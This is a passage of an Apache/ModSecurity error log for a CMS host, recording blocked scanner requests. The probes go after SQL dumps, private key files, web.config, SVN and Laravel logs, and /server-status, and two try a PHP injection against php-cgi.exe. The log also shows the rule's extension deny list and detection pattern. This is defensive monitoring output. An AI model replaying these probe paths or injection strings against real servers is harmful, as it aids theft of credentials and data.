[ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aGGtA3YyGnwcPpPuQvPfRAAAANM"] [Mon Jun 30 00:15:47.673402 2025] [:error] [pid 29331:tid 140563525326592] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aGGtA3YyGnwcPpPuQvPfRQAAANc"] [Mon Jun 30 00:15:47.681697 2025] [:error] [pid 29331:tid 140563759286016] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aGGtA3YyGnwcPpPuQvPfRgAAAMQ"] [Mon Jul 14 16:44:27.157754 2025] [:error] [pid 9637:tid 140038759220992] [client 20.171.207.130:36950] [client 20.171.207.130] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aHUJuxndiaGXr9t9Nccn1wAAAQg"] [Mon Jul 14 16:46:42.722430 2025] [autoindex:error] [pid 9637:tid 140038666901248] [client 20.171.207.130:38410] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 31 07:41:37.661814 2025] [:error] [pid 31038:tid 140191322814208] [client 198.144.182.13:57208] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Aug 09 00:54:25.136983 2025] [:error] [pid 29644:tid 29684] [client 142.93.143.8:55418] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aJZyEdf6g9KNVB5mOMBeJAAAAIE"] [Sat Aug 09 00:54:25.337283 2025] [:error] [pid 29744:tid 29752] [client 46.101.1.225:35654] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aJZyEQCFAVwl5yvo7JSItwAAAMY"] [Sat Aug 09 00:54:27.421134 2025] [authz_core:error] [pid 29744:tid 29759] [client 142.93.143.8:55476] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Aug 09 00:54:27.432231 2025] [authz_core:error] [pid 29643:tid 29706] [client 46.101.1.225:53988] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Aug 09 15:55:30.020825 2025] [:error] [pid 19140:tid 19164] [client 213.232.87.230:22101] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aJdFQtZWQqB9kC0z6L_mwwAAABI"] [Sat Aug 09 15:55:30.026120 2025] [:error] [pid 31076:tid 31101] [client 213.232.87.230:30735] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/backup.sql"] [unique_id "aJdFQjhU1dFqqif738af0wAAARI"] [Sat Aug 09 15:55:30.028452 2025] [:error] [pid 19140:tid 19156] [client 213.232.87.230:13173] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aJdFQtZWQqB9kC0z6L_myAAAAAo"] [Sat Aug 09 15:55:30.032062 2025] [:error] [pid 19140:tid 19146] [client 213.232.87.230:59931] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database_backup.sql"] [unique_id "aJdFQtZWQqB9kC0z6L_mygAAAAA"] [Sat Aug 09 15:55:30.048471 2025] [authz_host:error] [pid 19140:tid 19157] [client 213.232.87.230:31069] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Sat Aug 09 15:55:30.048497 2025] [authz_core:error] [pid 19140:tid 19157] [client 213.232.87.230:31069] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Aug 09 15:55:30.074019 2025] [:error] [pid 19140:tid 19170] [client 213.232.87.230:57353] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aJdFQtZWQqB9kC0z6L_mzQAAABg"] [Sat Aug 09 15:55:30.084376 2025] [:error] [pid 19140:tid 19169] [client 213.232.87.230:12101] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/web.config"] [unique_id "aJdFQtZWQqB9kC0z6L_mzwAAABc"] [Sat Aug 09 15:55:30.089151 2025] [:error] [pid 19140:tid 19148] [client 213.232.87.230:35433] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aJdFQtZWQqB9kC0z6L_m0gAAAAI"] [Sat Aug 09 15:55:30.097879 2025] [:error] [pid 19140:tid 19153] [client 213.232.87.230:30217] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aJdFQtZWQqB9kC0z6L_m1QAAAAc"] [Sat Aug 09 15:55:30.141312 2025] [:error] [pid 31076:tid 31104] [client 213.232.87.230:33169] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/server.key"] [unique_id "aJdFQjhU1dFqqif738af2AAAARU"] [Mon Aug 11 14:00:36.962311 2025] [:error] [pid 1371:tid 1377] [client 198.144.182.13:36726] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Aug 12 06:08:01.826852 2025] [:error] [pid 28811:tid 28819] [client 198.144.182.13:41240] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 08:34:48.425239 2025] [:error] [pid 12050:tid 12090] [client 198.144.182.13:47332] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 18:49:30.398112 2025] [:error] [pid 15178:tid 15205] [client 198.144.182.13:56220] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 23:43:31.876608 2025] [:error] [pid 15178:tid 15190] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aJz48zSzh4MhgQx9hZdVDQAAAQA"] [Wed Aug 13 23:43:31.973573 2025] [:error] [pid 15178:tid 15193] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/error.log"] [unique_id "aJz48zSzh4MhgQx9hZdVDgAAAQM"] [Wed Aug 13 23:43:32.033484 2025] [:error] [pid 15178:tid 15212] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aJz49DSzh4MhgQx9hZdVDwAAARY"] [Wed Aug 13 23:43:32.056226 2025] [:error] [pid 15178:tid 15195] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aJz49DSzh4MhgQx9hZdVEAAAAQU"] [Wed Aug 13 23:43:32.089344 2025] [:error] [pid 15178:tid 15213] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aJz49DSzh4MhgQx9hZdVEQAAARc"] [Wed Aug 13 23:43:32.138727 2025] [:error] [pid 15178:tid 15214] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aJz49DSzh4MhgQx9hZdVEgAAARg"] [Wed Aug 13 23:43:33.086151 2025] [:error] [pid 15178:tid 15203] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.backup"] [unique_id "aJz49TSzh4MhgQx9hZdVFgAAAQ0"] [Wed Aug 13 23:43:33.094241 2025] [:error] [pid 15178:tid 15208] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ 